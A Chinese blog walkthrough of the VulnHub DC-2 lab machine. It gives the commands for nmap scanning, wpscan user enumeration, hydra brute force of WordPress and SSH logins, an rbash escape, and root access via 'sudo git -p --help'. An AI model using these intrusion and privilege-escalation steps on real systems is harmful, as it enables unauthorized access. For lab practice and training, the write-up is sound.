vulnhub靶机DC-2

DC系列靶机2-9百度网盘下载链接链接:https://pan.baidu.com/s/1BHatml6HHnT-jsoZ-eHfsw
提取码:1xft

和DC1一样,先主机发现找到靶机的ip
使用nmap
nmap -sP 192.168.211.0/24
vulnhub靶机DC-2_第1张图片
根据MAC地址可以确定靶机的ip为192.168.211.134

然后扫描该ip所开放的端口服务

nmap -A 192.168.211.134 -p 1-65535

vulnhub靶机DC-2_第2张图片
目标开放了80端口和7744端口,7744端口上是ssh,80端口的web页面需要修改hosts才能访**/etc/hosts 需要本地dns解析**
vulnhub靶机DC-2_第3张图片
Windows下hosts文件路径

vulnhub靶机DC-2_第4张图片
成功访问该网站并且得到flag1,提示我们使用cewl
vulnhub靶机DC-2_第5张图片

该网站是由WordPress写的

vulnhub靶机DC-2_第6张图片

cewl(这个工具会自动爬取网站,并根据网站关键字生成字典)

使用方法 :cewl dc-2 >pwd.dic
vulnhub靶机DC-2_第7张图片

由于是个网站,我们进行网站目录扫描

使用msf对网站进行扫描

search scanner/http/dir

vulnhub靶机DC-2_第8张图片
use auxiliary/scanner/http/dir_scanner

vulnhub靶机DC-2_第9张图片

成功扫描到两个目录
vulnhub靶机DC-2_第10张图片

进行访问,但是没多大帮助

vulnhub靶机DC-2_第11张图片
然后我们使用工具wpscan

更新:wpscan --update

vulnhub靶机DC-2_第12张图片

在这里插入图片描述

vulnhub靶机DC-2_第13张图片这里发现kali出了点问题,wpscan怎么更新都扫描失败,然后就更换成kali2020.1版本进行扫描

扫描网站

对于WordPress网站,可以使用wp-scan进行扫描

wpscan --url dc-2 -e

vulnhub靶机DC-2_第14张图片

然后获取WordPress里面的用户账号

wpscan --url dc-2 -e u 发现有三个用户

vulnhub靶机DC-2_第15张图片
将这三个用户名写入一个字典中用来爆破
vulnhub靶机DC-2_第16张图片
然后我们进入网站后台

vulnhub靶机DC-2_第17张图片
爆破出来两个

在这里插入图片描述

登陆Jerry的之后发现flag2

vulnhub靶机DC-2_第18张图片
由于前面发现开放了7744端口为ssh端口,所以我们可以尝试使用刚才的字典进行ssh端口爆破

hydra -L user.txt -P pwd.dic ssh://192.168.211.134 -s 7744

vulnhub靶机DC-2_第19张图片

然后使用tom和parturient登陆ssh [email protected] -p 7744

vulnhub靶机DC-2_第20张图片
登陆成功,并且发现flag3,但是我们并不能查看

在这里插入图片描述

遇到了-rbash限制,所以我们要绕过rbash

导入$PATH

BASH_CMDS[a]=/bin/bash;a

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

这样我们就成功访问了flag3.txt

vulnhub靶机DC-2_第21张图片

flag3将我们指向jerry,

vulnhub靶机DC-2_第22张图片
发现Jerry为/bin/bash/说明可以登陆

su jerry
在这里插入图片描述
在home目录下发现flag4

vulnhub靶机DC-2_第23张图片
但是我们还不是root用户,接下来就要用到git提权

sudo git --help让我们git参数强制进入到交互模式

vulnhub靶机DC-2_第24张图片

sudo git -p --help强制进入交互模式后再调用bash进入root权限

vulnhub靶机DC-2_第25张图片
最后在root目录下发现flag5

vulnhub靶机DC-2_第26张图片

你可能感兴趣的:(vulnhub靶机系列)